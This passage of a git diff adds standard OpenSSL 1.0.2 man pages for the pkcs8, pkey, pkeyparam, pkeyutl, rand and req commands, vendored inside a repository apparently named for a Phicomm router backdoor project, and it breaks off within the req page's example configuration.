+=item B<PBE-SHA1-RC4-128 PBE-SHA1-RC4-40 PBE-SHA1-3DES PBE-SHA1-2DES PBE-SHA1-RC2-128 PBE-SHA1-RC2-40>
+
+These algorithms use the PKCS#12 password based encryption algorithm and
+allow strong encryption algorithms like triple DES or 128 bit RC2 to be used.
+
+=back
+
+=head1 EXAMPLES
+
+Convert a private from traditional to PKCS#5 v2.0 format using triple
+DES:
+
+ openssl pkcs8 -in key.pem -topk8 -v2 des3 -out enckey.pem
+
+Convert a private from traditional to PKCS#5 v2.0 format using AES with
+256 bits in CBC mode and B<hmacWithSHA256> PRF:
+
+ openssl pkcs8 -in key.pem -topk8 -v2 aes-256-cbc -v2prf hmacWithSHA256 -out enckey.pem
+
+Convert a private key to PKCS#8 using a PKCS#5 1.5 compatible algorithm
+(DES):
+
+ openssl pkcs8 -in key.pem -topk8 -out enckey.pem
+
+Convert a private key to PKCS#8 using a PKCS#12 compatible algorithm
+(3DES):
+
+ openssl pkcs8 -in key.pem -topk8 -out enckey.pem -v1 PBE-SHA1-3DES
+
+Read a DER unencrypted PKCS#8 format private key:
+
+ openssl pkcs8 -inform DER -nocrypt -in key.der -out key.pem
+
+Convert a private key from any PKCS#8 format to traditional format:
+
+ openssl pkcs8 -in pk8.pem -out key.pem
+
+=head1 STANDARDS
+
+Test vectors from this PKCS#5 v2.0 implementation were posted to the
+pkcs-tng mailing list using triple DES, DES and RC2 with high iteration
+counts, several people confirmed that they could decrypt the private
+keys produced and Therefore it can be assumed that the PKCS#5 v2.0
+implementation is reasonably accurate at least as far as these
+algorithms are concerned.
+
+The format of PKCS#8 DSA (and other) private keys is not well documented:
+it is hidden away in PKCS#11 v2.01, section 11.9. OpenSSL's default DSA
+PKCS#8 private key format complies with this standard.
+
+=head1 BUGS
+
+There should be an option that prints out the encryption algorithm
+in use and other details such as the iteration count.
+
+PKCS#8 using triple DES and PKCS#5 v2.0 should be the default private
+key format for OpenSSL: for compatibility several of the utilities use
+the old format at present.
+
+=head1 SEE ALSO
+
+L<dsa(1)|dsa(1)>, L<rsa(1)|rsa(1)>, L<genrsa(1)|genrsa(1)>,
+L<gendsa(1)|gendsa(1)> 
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/pkey.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/pkey.pod
new file mode 100644
index 0000000..4851223
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/pkey.pod
@@ -0,0 +1,135 @@
+
+=pod
+
+=head1 NAME
+
+pkey - public or private key processing tool
+
+=head1 SYNOPSIS
+
+B<openssl> B<pkey>
+[B<-inform PEM|DER>]
+[B<-outform PEM|DER>]
+[B<-in filename>]
+[B<-passin arg>]
+[B<-out filename>]
+[B<-passout arg>]
+[B<-cipher>]
+[B<-text>]
+[B<-text_pub>]
+[B<-noout>]
+[B<-pubin>]
+[B<-pubout>]
+[B<-engine id>]
+
+=head1 DESCRIPTION
+
+The B<pkey> command processes public or private keys. They can be converted
+between various forms and their components printed out.
+
+=head1 COMMAND OPTIONS
+
+=over 4
+
+=item B<-inform DER|PEM>
+
+This specifies the input format DER or PEM.
+
+=item B<-outform DER|PEM>
+
+This specifies the output format, the options have the same meaning as the 
+B<-inform> option.
+
+=item B<-in filename>
+
+This specifies the input filename to read a key from or standard input if this
+option is not specified. If the key is encrypted a pass phrase will be
+prompted for.
+
+=item B<-passin arg>
+
+the input file password source. For more information about the format of B<arg>
+see the B<PASS PHRASE ARGUMENTS> section in L<openssl(1)|openssl(1)>.
+
+=item B<-out filename>
+
+This specifies the output filename to write a key to or standard output if this
+option is not specified. If any encryption options are set then a pass phrase
+will be prompted for. The output filename should B<not> be the same as the input
+filename.
+
+=item B<-passout password>
+
+the output file password source. For more information about the format of B<arg>
+see the B<PASS PHRASE ARGUMENTS> section in L<openssl(1)|openssl(1)>.
+
+=item B<-cipher>
+
+These options encrypt the private key with the supplied cipher. Any algorithm
+name accepted by EVP_get_cipherbyname() is acceptable such as B<des3>.
+
+=item B<-text>
+
+prints out the various public or private key components in
+plain text in addition to the encoded version. 
+
+=item B<-text_pub>
+
+print out only public key components even if a private key is being processed.
+
+=item B<-noout>
+
+do not output the encoded version of the key.
+
+=item B<-pubin>
+
+by default a private key is read from the input file: with this
+option a public key is read instead.
+
+=item B<-pubout>
+
+by default a private key is output: with this option a public
+key will be output instead. This option is automatically set if
+the input is a public key.
+
+=item B<-engine id>
+
+specifying an engine (by its unique B<id> string) will cause B<pkey>
+to attempt to obtain a functional reference to the specified engine,
+thus initialising it if needed. The engine will then be set as the default
+for all available algorithms.
+
+=back
+
+=head1 EXAMPLES
+
+To remove the pass phrase on an RSA private key:
+
+ openssl pkey -in key.pem -out keyout.pem
+
+To encrypt a private key using triple DES:
+
+ openssl pkey -in key.pem -des3 -out keyout.pem
+
+To convert a private key from PEM to DER format: 
+
+ openssl pkey -in key.pem -outform DER -out keyout.der
+
+To print out the components of a private key to standard output:
+
+ openssl pkey -in key.pem -text -noout
+
+To print out the public components of a private key to standard output:
+
+ openssl pkey -in key.pem -text_pub -noout
+
+To just output the public part of a private key:
+
+ openssl pkey -in key.pem -pubout -out pubkey.pem
+
+=head1 SEE ALSO
+
+L<genpkey(1)|genpkey(1)>, L<rsa(1)|rsa(1)>, L<pkcs8(1)|pkcs8(1)>,
+L<dsa(1)|dsa(1)>, L<genrsa(1)|genrsa(1)>, L<gendsa(1)|gendsa(1)> 
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/pkeyparam.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/pkeyparam.pod
new file mode 100644
index 0000000..154f672
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/pkeyparam.pod
@@ -0,0 +1,69 @@
+
+=pod
+
+=head1 NAME
+
+pkeyparam - public key algorithm parameter processing tool
+
+=head1 SYNOPSIS
+
+B<openssl> B<pkeyparam>
+[B<-in filename>]
+[B<-out filename>]
+[B<-text>]
+[B<-noout>]
+[B<-engine id>]
+
+=head1 DESCRIPTION
+
+The B<pkey> command processes public or private keys. They can be converted
+between various forms and their components printed out.
+
+=head1 COMMAND OPTIONS
+
+=over 4
+
+=item B<-in filename>
+
+This specifies the input filename to read parameters from or standard input if
+this option is not specified.
+
+=item B<-out filename>
+
+This specifies the output filename to write parameters to or standard output if
+this option is not specified.
+
+=item B<-text>
+
+prints out the parameters in plain text in addition to the encoded version. 
+
+=item B<-noout>
+
+do not output the encoded version of the parameters.
+
+=item B<-engine id>
+
+specifying an engine (by its unique B<id> string) will cause B<pkeyparam>
+to attempt to obtain a functional reference to the specified engine,
+thus initialising it if needed. The engine will then be set as the default
+for all available algorithms.
+
+=back
+
+=head1 EXAMPLE
+
+Print out text version of parameters:
+
+ openssl pkeyparam -in param.pem -text
+
+=head1 NOTES
+
+There are no B<-inform> or B<-outform> options for this command because only
+PEM format is supported because the key type is determined by the PEM headers.
+
+=head1 SEE ALSO
+
+L<genpkey(1)|genpkey(1)>, L<rsa(1)|rsa(1)>, L<pkcs8(1)|pkcs8(1)>,
+L<dsa(1)|dsa(1)>, L<genrsa(1)|genrsa(1)>, L<gendsa(1)|gendsa(1)> 
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/pkeyutl.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/pkeyutl.pod
new file mode 100644
index 0000000..27be9a9
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/pkeyutl.pod
@@ -0,0 +1,222 @@
+=pod
+
+=head1 NAME
+
+pkeyutl - public key algorithm utility
+
+=head1 SYNOPSIS
+
+B<openssl> B<pkeyutl>
+[B<-in file>]
+[B<-out file>]
+[B<-sigfile file>]
+[B<-inkey file>]
+[B<-keyform PEM|DER>]
+[B<-passin arg>]
+[B<-peerkey file>]
+[B<-peerform PEM|DER>]
+[B<-pubin>]
+[B<-certin>]
+[B<-rev>]
+[B<-sign>]
+[B<-verify>]
+[B<-verifyrecover>]
+[B<-encrypt>]
+[B<-decrypt>]
+[B<-derive>]
+[B<-pkeyopt opt:value>]
+[B<-hexdump>]
+[B<-asn1parse>]
+[B<-engine id>]
+
+=head1 DESCRIPTION
+
+The B<pkeyutl> command can be used to perform public key operations using
+any supported algorithm.
+
+=head1 COMMAND OPTIONS
+
+=over 4
+
+=item B<-in filename>
+
+This specifies the input filename to read data from or standard input
+if this option is not specified.
+
+=item B<-out filename>
+
+specifies the output filename to write to or standard output by
+default.
+
+=item B<-inkey file>
+
+the input key file, by default it should be a private key.
+
+=item B<-keyform PEM|DER>
+
+the key format PEM, DER or ENGINE.
+
+=item B<-passin arg>
+
+the input key password source. For more information about the format of B<arg>
+see the B<PASS PHRASE ARGUMENTS> section in L<openssl(1)|openssl(1)>.
+
+
+=item B<-peerkey file>
+
+the peer key file, used by key derivation (agreement) operations.
+
+=item B<-peerform PEM|DER>
+
+the peer key format PEM, DER or ENGINE.
+
+=item B<-engine id>
+
+specifying an engine (by its unique B<id> string) will cause B<pkeyutl>
+to attempt to obtain a functional reference to the specified engine,
+thus initialising it if needed. The engine will then be set as the default
+for all available algorithms.
+
+
+=item B<-pubin>
+
+the input file is a public key. 
+
+=item B<-certin>
+
+the input is a certificate containing a public key. 
+
+=item B<-rev>
+
+reverse the order of the input buffer. This is useful for some libraries
+(such as CryptoAPI) which represent the buffer in little endian format.
+
+=item B<-sign>
+
+sign the input data and output the signed result. This requires
+a private key.
+
+=item B<-verify>
+
+verify the input data against the signature file and indicate if the
+verification succeeded or failed.
+
+=item B<-verifyrecover>
+
+verify the input data and output the recovered data.
+
+=item B<-encrypt>
+
+encrypt the input data using a public key.
+
+=item B<-decrypt>
+
+decrypt the input data using a private key.
+
+=item B<-derive>
+
+derive a shared secret using the peer key.
+
+=item B<-hexdump>
+
+hex dump the output data.
+
+=item B<-asn1parse>
+
+asn1parse the output data, this is useful when combined with the
+B<-verifyrecover> option when an ASN1 structure is signed.
+
+=back
+
+=head1 NOTES
+
+The operations and options supported vary according to the key algorithm
+and its implementation. The OpenSSL operations and options are indicated below.
+
+Unless otherwise mentioned all algorithms support the B<digest:alg> option
+which specifies the digest in use for sign, verify and verifyrecover operations.
+The value B<alg> should represent a digest name as used in the
+EVP_get_digestbyname() function for example B<sha1>.
+
+=head1 RSA ALGORITHM
+
+The RSA algorithm supports encrypt, decrypt, sign, verify and verifyrecover
+operations in general. Some padding modes only support some of these 
+operations however.
+
+=over 4
+
+=item -B<rsa_padding_mode:mode>
+
+This sets the RSA padding mode. Acceptable values for B<mode> are B<pkcs1> for
+PKCS#1 padding, B<sslv23> for SSLv23 padding, B<none> for no padding, B<oaep>
+for B<OAEP> mode, B<x931> for X9.31 mode and B<pss> for PSS.
+
+In PKCS#1 padding if the message digest is not set then the supplied data is 
+signed or verified directly instead of using a B<DigestInfo> structure. If a
+digest is set then the a B<DigestInfo> structure is used and its the length
+must correspond to the digest type.
+
+For B<oeap> mode only encryption and decryption is supported.
+
+For B<x931> if the digest type is set it is used to format the block data
+otherwise the first byte is used to specify the X9.31 digest ID. Sign,
+verify and verifyrecover are can be performed in this mode.
+
+For B<pss> mode only sign and verify are supported and the digest type must be
+specified.
+
+=item B<rsa_pss_saltlen:len>
+
+For B<pss> mode only this option specifies the salt length. Two special values
+are supported: -1 sets the salt length to the digest length. When signing -2
+sets the salt length to the maximum permissible value. When verifying -2 causes
+the salt length to be automatically determined based on the B<PSS> block
+structure.
+
+=back
+
+=head1 DSA ALGORITHM
+
+The DSA algorithm supports signing and verification operations only. Currently
+there are no additional options other than B<digest>. Only the SHA1
+digest can be used and this digest is assumed by default.
+
+=head1 DH ALGORITHM
+
+The DH algorithm only supports the derivation operation and no additional
+options.
+
+=head1 EC ALGORITHM
+
+The EC algorithm supports sign, verify and derive operations. The sign and
+verify operations use ECDSA and derive uses ECDH. Currently there are no
+additional options other than B<digest>. Only the SHA1 digest can be used and
+this digest is assumed by default.
+
+=head1 EXAMPLES
+
+Sign some data using a private key:
+
+ openssl pkeyutl -sign -in file -inkey key.pem -out sig
+
+Recover the signed data (e.g. if an RSA key is used):
+
+ openssl pkeyutl -verifyrecover -in sig -inkey key.pem
+
+Verify the signature (e.g. a DSA key):
+
+ openssl pkeyutl -verify -in file -sigfile sig -inkey key.pem
+
+Sign data using a message digest value (this is currently only valid for RSA):
+
+ openssl pkeyutl -sign -in file -inkey key.pem -out sig -pkeyopt digest:sha256
+
+Derive a shared secret value:
+
+ openssl pkeyutl -derive -inkey key.pem -peerkey pubkey.pem -out secret
+
+=head1 SEE ALSO
+
+L<genpkey(1)|genpkey(1)>, L<pkey(1)|pkey(1)>, L<rsautl(1)|rsautl(1)>
+L<dgst(1)|dgst(1)>, L<rsa(1)|rsa(1)>, L<genrsa(1)|genrsa(1)>
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/rand.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/rand.pod
new file mode 100644
index 0000000..d1d213e
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/rand.pod
@@ -0,0 +1,55 @@
+=pod
+
+=head1 NAME
+
+rand - generate pseudo-random bytes
+
+=head1 SYNOPSIS
+
+B<openssl rand>
+[B<-out> I<file>]
+[B<-rand> I<file(s)>]
+[B<-base64>]
+[B<-hex>]
+I<num>
+
+=head1 DESCRIPTION
+
+The B<rand> command outputs I<num> pseudo-random bytes after seeding
+the random number generator once.  As in other B<openssl> command
+line tools, PRNG seeding uses the file I<$HOME/>B<.rnd> or B<.rnd>
+in addition to the files given in the B<-rand> option.  A new
+I<$HOME>/B<.rnd> or B<.rnd> file will be written back if enough
+seeding was obtained from these sources.
+
+=head1 OPTIONS
+
+=over 4
+
+=item B<-out> I<file>
+
+Write to I<file> instead of standard output.
+
+=item B<-rand> I<file(s)>
+
+Use specified file or files or EGD socket (see L<RAND_egd(3)|RAND_egd(3)>)
+for seeding the random number generator.
+Multiple files can be specified separated by a OS-dependent character.
+The separator is B<;> for MS-Windows, B<,> for OpenVMS, and B<:> for
+all others.
+
+=item B<-base64>
+
+Perform base64 encoding on the output.
+
+=item B<-hex>
+
+Show the output as a hex string.
+
+=back
+
+=head1 SEE ALSO
+
+L<RAND_bytes(3)|RAND_bytes(3)>
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/req.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/req.pod
new file mode 100644
index 0000000..df68cb0
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/req.pod
@@ -0,0 +1,678 @@
+
+=pod
+
+=head1 NAME
+
+req - PKCS#10 certificate request and certificate generating utility.
+
+=head1 SYNOPSIS
+
+B<openssl> B<req>
+[B<-inform PEM|DER>]
+[B<-outform PEM|DER>]
+[B<-in filename>]
+[B<-passin arg>]
+[B<-out filename>]
+[B<-passout arg>]
+[B<-text>]
+[B<-pubkey>]
+[B<-noout>]
+[B<-verify>]
+[B<-modulus>]
+[B<-new>]
+[B<-rand file(s)>]
+[B<-newkey rsa:bits>]
+[B<-newkey alg:file>]
+[B<-nodes>]
+[B<-key filename>]
+[B<-keyform PEM|DER>]
+[B<-keyout filename>]
+[B<-keygen_engine id>]
+[B<-[digest]>]
+[B<-config filename>]
+[B<-subj arg>]
+[B<-multivalue-rdn>]
+[B<-x509>]
+[B<-days n>]
+[B<-set_serial n>]
+[B<-asn1-kludge>]
+[B<-no-asn1-kludge>]
+[B<-newhdr>]
+[B<-extensions section>]
+[B<-reqexts section>]
+[B<-utf8>]
+[B<-nameopt>]
+[B<-reqopt>]
+[B<-subject>]
+[B<-subj arg>]
+[B<-batch>]
+[B<-verbose>]
+[B<-engine id>]
+
+=head1 DESCRIPTION
+
+The B<req> command primarily creates and processes certificate requests
+in PKCS#10 format. It can additionally create self signed certificates
+for use as root CAs for example.
+
+=head1 COMMAND OPTIONS
+
+=over 4
+
+=item B<-inform DER|PEM>
+
+This specifies the input format. The B<DER> option uses an ASN1 DER encoded
+form compatible with the PKCS#10. The B<PEM> form is the default format: it
+consists of the B<DER> format base64 encoded with additional header and
+footer lines.
+
+=item B<-outform DER|PEM>
+
+This specifies the output format, the options have the same meaning as the 
+B<-inform> option.
+
+=item B<-in filename>
+
+This specifies the input filename to read a request from or standard input
+if this option is not specified. A request is only read if the creation
+options (B<-new> and B<-newkey>) are not specified.
+
+=item B<-passin arg>
+
+the input file password source. For more information about the format of B<arg>
+see the B<PASS PHRASE ARGUMENTS> section in L<openssl(1)|openssl(1)>.
+
+=item B<-out filename>
+
+This specifies the output filename to write to or standard output by
+default.
+
+=item B<-passout arg>
+
+the output file password source. For more information about the format of B<arg>
+see the B<PASS PHRASE ARGUMENTS> section in L<openssl(1)|openssl(1)>.
+
+=item B<-text>
+
+prints out the certificate request in text form.
+
+=item B<-subject>
+
+prints out the request subject (or certificate subject if B<-x509> is
+specified)
+
+=item B<-pubkey>
+
+outputs the public key.
+
+=item B<-noout>
+
+this option prevents output of the encoded version of the request.
+
+=item B<-modulus>
+
+this option prints out the value of the modulus of the public key
+contained in the request.
+
+=item B<-verify>
+
+verifies the signature on the request.
+
+=item B<-new>
+
+this option generates a new certificate request. It will prompt
+the user for the relevant field values. The actual fields
+prompted for and their maximum and minimum sizes are specified
+in the configuration file and any requested extensions.
+
+If the B<-key> option is not used it will generate a new RSA private
+key using information specified in the configuration file.
+
+=item B<-subj arg>
+
+Replaces subject field of input request with specified data and outputs
+modified request. The arg must be formatted as
+I</type0=value0/type1=value1/type2=...>,
+characters may be escaped by \ (backslash), no spaces are skipped.
+
+=item B<-rand file(s)>
+
+a file or files containing random data used to seed the random number
+generator, or an EGD socket (see L<RAND_egd(3)|RAND_egd(3)>).
+Multiple files can be specified separated by a OS-dependent character.
+The separator is B<;> for MS-Windows, B<,> for OpenVMS, and B<:> for
+all others.
+
+=item B<-newkey arg>
+
+this option creates a new certificate request and a new private
+key. The argument takes one of several forms. B<rsa:nbits>, where
+B<nbits> is the number of bits, generates an RSA key B<nbits>
+in size. If B<nbits> is omitted, i.e. B<-newkey rsa> specified,
+the default key size, specified in the configuration file is used.
+
+All other algorithms support the B<-newkey alg:file> form, where file may be
+an algorithm parameter file, created by the B<genpkey -genparam> command
+or and X.509 certificate for a key with approriate algorithm.
+
+B<param:file> generates a key using the parameter file or certificate B<file>,
+the algorithm is determined by the parameters. B<algname:file> use algorithm
+B<algname> and parameter file B<file>: the two algorithms must match or an
+error occurs. B<algname> just uses algorithm B<algname>, and parameters,
+if neccessary should be specified via B<-pkeyopt> parameter.
+
+B<dsa:filename> generates a DSA key using the parameters
+in the file B<filename>. B<ec:filename> generates EC key (usable both with
+ECDSA or ECDH algorithms), B<gost2001:filename> generates GOST R
+34.10-2001 key (requires B<ccgost> engine configured in the configuration
+file). If just B<gost2001> is specified a parameter set should be
+specified by B<-pkeyopt paramset:X>
+
+
+=item B<-pkeyopt opt:value>
+
+set the public key algorithm option B<opt> to B<value>. The precise set of
+options supported depends on the public key algorithm used and its
+implementation. See B<KEY GENERATION OPTIONS> in the B<genpkey> manual page
+for more details.
+
+=item B<-key filename>
+
+This specifies the file to read the private key from. It also
+accepts PKCS#8 format private keys for PEM format files.
+
+=item B<-keyform PEM|DER>
+
+the format of the private key file specified in the B<-key>
+argument. PEM is the default.
+
+=item B<-keyout filename>
+
+this gives the filename to write the newly created private key to.
+If this option is not specified then the filename present in the
+configuration file is used.
+
+=item B<-nodes>
+
+if this option is specified then if a private key is created it
+will not be encrypted.
+
+=item B<-[digest]>
+
+this specifies the message digest to sign the request with (such as
+B<-md5>, B<-sha1>). This overrides the digest algorithm specified in
+the configuration file.
+
+Some public key algorithms may override this choice. For instance, DSA
+signatures always use SHA1, GOST R 34.10 signatures always use
+GOST R 34.11-94 (B<-md_gost94>).
+
+=item B<-config filename>
+
+this allows an alternative configuration file to be specified,
+this overrides the compile time filename or any specified in
+the B<OPENSSL_CONF> environment variable.
+
+=item B<-subj arg>
+
+sets subject name for new request or supersedes the subject name
+when processing a request.
+The arg must be formatted as I</type0=value0/type1=value1/type2=...>,
+characters may be escaped by \ (backslash), no spaces are skipped.
+
+=item B<-multivalue-rdn>
+
+this option causes the -subj argument to be interpreted with full
+support for multivalued RDNs. Example:
+
+I</DC=org/DC=OpenSSL/DC=users/UID=123456+CN=John Doe>
+
+If -multi-rdn is not used then the UID value is I<123456+CN=John Doe>.
+
+=item B<-x509>
+
+this option outputs a self signed certificate instead of a certificate
+request. This is typically used to generate a test certificate or
+a self signed root CA. The extensions added to the certificate
+(if any) are specified in the configuration file. Unless specified
+using the B<set_serial> option, a large random number will be used for
+the serial number.
+
+=item B<-days n>
+
+when the B<-x509> option is being used this specifies the number of
+days to certify the certificate for. The default is 30 days.
+
+=item B<-set_serial n>
+
+serial number to use when outputting a self signed certificate. This
+may be specified as a decimal value or a hex value if preceded by B<0x>.
+It is possible to use negative serial numbers but this is not recommended.
+
+=item B<-extensions section>
+
+=item B<-reqexts section>
+
+these options specify alternative sections to include certificate
+extensions (if the B<-x509> option is present) or certificate
+request extensions. This allows several different sections to
+be used in the same configuration file to specify requests for
+a variety of purposes.
+
+=item B<-utf8>
+
+this option causes field values to be interpreted as UTF8 strings, by 
+default they are interpreted as ASCII. This means that the field
+values, whether prompted from a terminal or obtained from a
+configuration file, must be valid UTF8 strings.
+
+=item B<-nameopt option>
+
+option which determines how the subject or issuer names are displayed. The
+B<option> argument can be a single option or multiple options separated by
+commas.  Alternatively the B<-nameopt> switch may be used more than once to
+set multiple options. See the L<x509(1)|x509(1)> manual page for details.
+
+=item B<-reqopt>
+
+customise the output format used with B<-text>. The B<option> argument can be
+a single option or multiple options separated by commas. 
+
+See discission of the  B<-certopt> parameter in the L<B<x509>|x509(1)>
+command.
+
+
+=item B<-asn1-kludge>
+
+by default the B<req> command outputs certificate requests containing
+no attributes in the correct PKCS#10 format. However certain CAs will only
+accept requests containing no attributes in an invalid form: this
+option produces this invalid format.
+
+More precisely the B<Attributes> in a PKCS#10 certificate request
+are defined as a B<SET OF Attribute>. They are B<not OPTIONAL> so
+if no attributes are present then they should be encoded as an
+empty B<SET OF>. The invalid form does not include the empty
+B<SET OF> whereas the correct form does.
+
+It should be noted that very few CAs still require the use of this option.
+
+=item B<-no-asn1-kludge>
+
+Reverses effect of B<-asn1-kludge>
+
+=item B<-newhdr>
+
+Adds the word B<NEW> to the PEM file header and footer lines on the outputted
+request. Some software (Netscape certificate server) and some CAs need this.
+
+=item B<-batch>
+
+non-interactive mode.
+
+=item B<-verbose>
+
+print extra details about the operations being performed.
+
+=item B<-engine id>
+
+specifying an engine (by its unique B<id> string) will cause B<req>
+to attempt to obtain a functional reference to the specified engine,
+thus initialising it if needed. The engine will then be set as the default
+for all available algorithms.
+
+=item B<-keygen_engine id>
+
+specifies an engine (by its unique B<id> string) which would be used
+for key generation operations.
+
+=back
+
+=head1 CONFIGURATION FILE FORMAT
+
+The configuration options are specified in the B<req> section of
+the configuration file. As with all configuration files if no
+value is specified in the specific section (i.e. B<req>) then
+the initial unnamed or B<default> section is searched too.
+
+The options available are described in detail below.
+
+=over 4
+
+=item B<input_password output_password>
+
+The passwords for the input private key file (if present) and
+the output private key file (if one will be created). The
+command line options B<passin> and B<passout> override the
+configuration file values.
+
+=item B<default_bits>
+
+This specifies the default key size in bits. If not specified then
+512 is used. It is used if the B<-new> option is used. It can be
+overridden by using the B<-newkey> option.
+
+=item B<default_keyfile>
+
+This is the default filename to write a private key to. If not
+specified the key is written to standard output. This can be
+overridden by the B<-keyout> option.
+
+=item B<oid_file>
+
+This specifies a file containing additional B<OBJECT IDENTIFIERS>.
+Each line of the file should consist of the numerical form of the
+object identifier followed by white space then the short name followed
+by white space and finally the long name. 
+
+=item B<oid_section>
+
+This specifies a section in the configuration file containing extra
+object identifiers. Each line should consist of the short name of the
+object identifier followed by B<=> and the numerical form. The short
+and long names are the same when this option is used.
+
+=item B<RANDFILE>
+
+This specifies a filename in which random number seed information is
+placed and read from, or an EGD socket (see L<RAND_egd(3)|RAND_egd(3)>).
+It is used for private key generation.
+
+=item B<encrypt_key>
+
+If this is set to B<no> then if a private key is generated it is
+B<not> encrypted. This is equivalent to the B<-nodes> command line
+option. For compatibility B<encrypt_rsa_key> is an equivalent option.
+
+=item B<default_md>
+
+This option specifies the digest algorithm to use. Possible values
+include B<md5 sha1 mdc2>. If not present then MD5 is used. This
+option can be overridden on the command line.
+
+=item B<string_mask>
+
+This option masks out the use of certain string types in certain
+fields. Most users will not need to change this option.
+
+It can be set to several values B<default> which is also the default
+option uses PrintableStrings, T61Strings and BMPStrings if the 
+B<pkix> value is used then only PrintableStrings and BMPStrings will
+be used. This follows the PKIX recommendation in RFC2459. If the
+B<utf8only> option is used then only UTF8Strings will be used: this
+is the PKIX recommendation in RFC2459 after 2003. Finally the B<nombstr>
+option just uses PrintableStrings and T61Strings: certain software has
+problems with BMPStrings and UTF8Strings: in particular Netscape.
+
+=item B<req_extensions>
+
+this specifies the configuration file section containing a list of
+extensions to add to the certificate request. It can be overridden
+by the B<-reqexts> command line switch. See the 
+L<x509v3_config(5)|x509v3_config(5)> manual page for details of the
+extension section format.
+
+=item B<x509_extensions>
+
+this specifies the configuration file section containing a list of
+extensions to add to certificate generated when the B<-x509> switch
+is used. It can be overridden by the B<-extensions> command line switch.
+
+=item B<prompt>
+
+if set to the value B<no> this disables prompting of certificate fields
+and just takes values from the config file directly. It also changes the
+expected format of the B<distinguished_name> and B<attributes> sections.
+
+=item B<utf8>
+
+if set to the value B<yes> then field values to be interpreted as UTF8
+strings, by default they are interpreted as ASCII. This means that
+the field values, whether prompted from a terminal or obtained from a
+configuration file, must be valid UTF8 strings.
+
+=item B<attributes>
+
+this specifies the section containing any request attributes: its format
+is the same as B<distinguished_name>. Typically these may contain the
+challengePassword or unstructuredName types. They are currently ignored
+by OpenSSL's request signing utilities but some CAs might want them.
+
+=item B<distinguished_name>
+
+This specifies the section containing the distinguished name fields to
+prompt for when generating a certificate or certificate request. The format
+is described in the next section.
+
+=back
+
+=head1 DISTINGUISHED NAME AND ATTRIBUTE SECTION FORMAT
+
+There are two separate formats for the distinguished name and attribute
+sections. If the B<prompt> option is set to B<no> then these sections
+just consist of field names and values: for example,
+
+ CN=My Name
+ OU=My Organization
+ emailAddress=someone@somewhere.org
+
+This allows external programs (e.g. GUI based) to generate a template file
+with all the field names and values and just pass it to B<req>. An example
+of this kind of configuration file is contained in the B<EXAMPLES> section.
+
+Alternatively if the B<prompt> option is absent or not set to B<no> then the
+file contains field prompting information. It consists of lines of the form:
+
+ fieldName="prompt"
+ fieldName_default="default field value"
+ fieldName_min= 2
+ fieldName_max= 4
+
+"fieldName" is the field name being used, for example commonName (or CN).
+The "prompt" string is used to ask the user to enter the relevant
+details. If the user enters nothing then the default value is used if no
+default value is present then the field is omitted. A field can
+still be omitted if a default value is present if the user just
+enters the '.' character.
+
+The number of characters entered must be between the fieldName_min and
+fieldName_max limits: there may be additional restrictions based
+on the field being used (for example countryName can only ever be
+two characters long and must fit in a PrintableString).
+
+Some fields (such as organizationName) can be used more than once
+in a DN. This presents a problem because configuration files will
+not recognize the same name occurring twice. To avoid this problem
+if the fieldName contains some characters followed by a full stop
+they will be ignored. So for example a second organizationName can
+be input by calling it "1.organizationName".
+
+The actual permitted field names are any object identifier short or
+long names. These are compiled into OpenSSL and include the usual
+values such as commonName, countryName, localityName, organizationName,
+organizationUnitName, stateOrProvinceName. Additionally emailAddress
+is include as well as name, surname, givenName initials and dnQualifier.
+
+Additional object identifiers can be defined with the B<oid_file> or
+B<oid_section> options in the configuration file. Any additional fields
+will be treated as though they were a DirectoryString.
+
+
+=head1 EXAMPLES
+
+Examine and verify certificate request:
+
+ openssl req -in req.pem -text -verify -noout
+
+Create a private key and then generate a certificate request from it:
+
+ openssl genrsa -out key.pem 1024
+ openssl req -new -key key.pem -out req.pem
+
+The same but just using req:
+
+ openssl req -newkey rsa:1024 -keyout key.pem -out req.pem
+
+Generate a self signed root certificate:
+
+ openssl req -x509 -newkey rsa:1024 -keyout key.pem -out req.pem
+
+Example of a file pointed to by the B<oid_file> option:
+
+ 1.2.3.4	shortName	A longer Name
+ 1.2.3.6	otherName	Other longer Name
+
+Example of a section pointed to by B<oid_section> making use of variable
+expansion:
+
+ testoid1=1.2.3.5
+ testoid2=${testoid1}.6
+
+Sample configuration file prompting for field values:
+
+ [ req ]
+ default_bits		= 1024
+ default_keyfile 	= privkey.pem
+ distinguished_name	= req_distinguished_name
+ attributes		= req_attributes
+ x509_extensions	= v3_ca
+
+ dirstring_type = nobmp
+
+ [ req_distinguished_name ]
+ countryName			= Country Name (2 letter code)
+ countryName_default		= AU
+ countryName_min		= 2
+ countryName_max		= 2
+
+ localityName			= Locality Name (eg, city)
+
+ organizationalUnitName		= Organizational Unit Name (eg, section)
+
+ commonName			= Common Name (eg, YOUR name)
+ commonName_max			= 64
+
+ emailAddress			= Email Address
+ emailAddress_max		= 40
+
+ [ req_attributes ]
+ challengePassword		= A challenge password
+ challengePassword_min		= 4
+ challengePassword_max		= 20
+
+ [ v3_ca ]
+
+ subjectKeyIdentifier=hash
+ authorityKeyIdentifier=keyid:always,issuer:always
+ basicConstraints = CA:true
+
+Sample configuration containing all field values:
+
+
